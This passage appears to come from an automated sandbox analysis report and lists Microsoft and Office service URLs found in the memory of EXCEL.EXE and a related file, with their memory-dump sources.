    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falsetO
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?iEurM6
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886649798.00000000128D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.284984687.00000000128ED000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884623877.00000000128D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885402923.00000000128D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892081913.00000000128D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.net#R
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netR
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com%F
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885884780.0000000012845000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comSharepointFilesHostFormat
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885884780.0000000012845000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonv
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/dllH
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/quer
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions$B
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json8
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventse
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891872749.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885251853.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://settings.outlook.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://shell.suite.office.com:1443fU
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work=3
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://staging.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplateDeepLinkingServiceChinahttps://store.offi.
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplateDeepLinkingServiceChinahttps://store.office.cn/addinstemplateD
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplateH1
    Source: EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWriteJ
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com7A
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com;F
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comqG
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/Y
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://unitedkingdom-api.fp.wd.
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates-api.fp.wd.microso
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
